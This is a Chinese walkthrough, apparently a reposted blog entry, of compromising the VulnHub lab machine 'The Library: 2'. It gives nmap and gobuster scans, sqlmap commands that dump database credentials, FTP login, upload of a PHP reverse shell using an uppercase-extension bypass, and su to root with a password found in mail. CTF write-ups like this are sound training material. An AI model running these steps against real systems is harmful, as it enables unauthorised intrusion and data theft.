当前位置: 首页 > news >正文

The Library: 2靶场渗透

The Library: 2

来自 <https://www.vulnhub.com/entry/the-library-2,335/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.154

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.154

 

4,访问80端口的http服务

再扫描其子目录看看

gobuster dir -u http://192.168.23.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

http://192.168.23.154/library.php

熟悉的界面,但是不是熟悉的漏洞

5,这里使用burpsuite抓请求包,将请求方法更改为 POST 并附带随机国家 / 地区值时,我们看到一条关于移除 POST 参数逻辑的调试注释

复制黏贴这个POST请求到txt文件再去运行 SQLMAP

sqlmap -r sql.txt

sqlmap -r sql.txt --dbs

爆出来数据库,再去爆library数据库下数据表

sqlmap -r sql.txt -D library --tables --batch

在去爆access数据表下的字段

sqlmap -r sql.txt -D library -T access --columns --batch

最后爆出来账户和密码

6,账户globus,密码AroundTheWorld成功登录到ftp服务器

发现有一个文件夹叫hmtl,里面有一个文件叫library.php,基本可以判断ftp服务器的工作目录就是网站根目录

7,上传一个木马到ftp服务器的html目录,这里使用kali自带的木马文件,以便反弹shell

然后再上传shell.php到ftp服务器的html目录下,发现上传失败

是因为ftp服务器禁止上传后缀名为php的文件,使用上传shell.PHP试试。注意赋予可执行权限

chmod 777 shell.PHP

在浏览器访问 http://192.168.23.154/shell.PHP 即可触发反弹shell,注意kali打开对4444端口的监听

成功getshell

8,再启动一个可交互式shell,然后信息收集

python -c 'import pty;pty.spawn("/bin/bash")'

发现邮件里面就藏在root用户的账户密码secretPassword

su root

提权成功

http://www.dtcms.com/a/393486.html

相关文章:

  • 金融知识“厦”乡趣 平安产险厦门分公司启动2025年“金融教育宣传周”活动
  • C++学习笔记——模板初阶
  • Windows 下 WSL2 生态:Ubuntu/Docker Desktop 关系、VLLM 部署差异与性能解析
  • 智能体技术革命:从华为金融智能体FAB看AI智能体的未来发展与行业影响
  • CIKM 2025 | FinCast:用于金融时间序列预测的基础模型
  • 论文解读——矩形隧道中MIMO信道特性的模态理论解释
  • Mac brew VSCode Python3
  • 【C++】list 的使用及迭代器底层详解
  • NumPy 系列(三):numpy 数组的索引
  • STL源码探秘(一):深入剖析List的迭代器设计与实现
  • PNP机器人九月具身智能引领FRANKA机器人具身智能技术创新与人形机器人产业全球化新格局,全球具身领先生态推动模型部署和泛化
  • ACP(八):用插件扩展答疑机器人的能力边界
  • 迁移学习:从理论到实践,让模型 “举一反三” 的核心技术
  • ACP(六)自动化评测机器人的表现
  • 【MySQL数据库】MySQL的第一步:从安装启动到用户权限配置的一站式实战指南
  • MySQL笔记7
  • 【C语言】C语言预处理详解,从基础到进阶的全面讲解
  • Spotify:递归嵌入与聚类(四)
  • 三种查询语言比较:SQL、SPL、PromQL
  • [Windows] 迅连科技音频处理工具 CyberLink AudioDirector 2026 16.0.5703.0 中文多语免费版
  • (一)React面试(虚拟DOM/类组件)
  • 亲历 2025 机器人大赛:科技碰撞的震撼与启迪
  • Chromium 138 编译指南 Ubuntu篇:Python环境与开发工具配置(五)
  • 在CentOS上配置SVN至Web目录的自动同步
  • 一款不错的PDF工具,吾爱出品
  • Sleuth + Zipkin:微服务监控之分布式链路追踪技术
  • JVM 调优在分布式场景下的特殊策略:从集群 GC 分析到 OOM 排查实战(一)
  • 【开题答辩全过程】以 基于Vue技术实现权限管理系统为例,包含答辩的问题和答案
  • Redis 高可用架构全解析:主从复制、哨兵与集群模式
  • Redis全面解析:从基础配置到高可用集群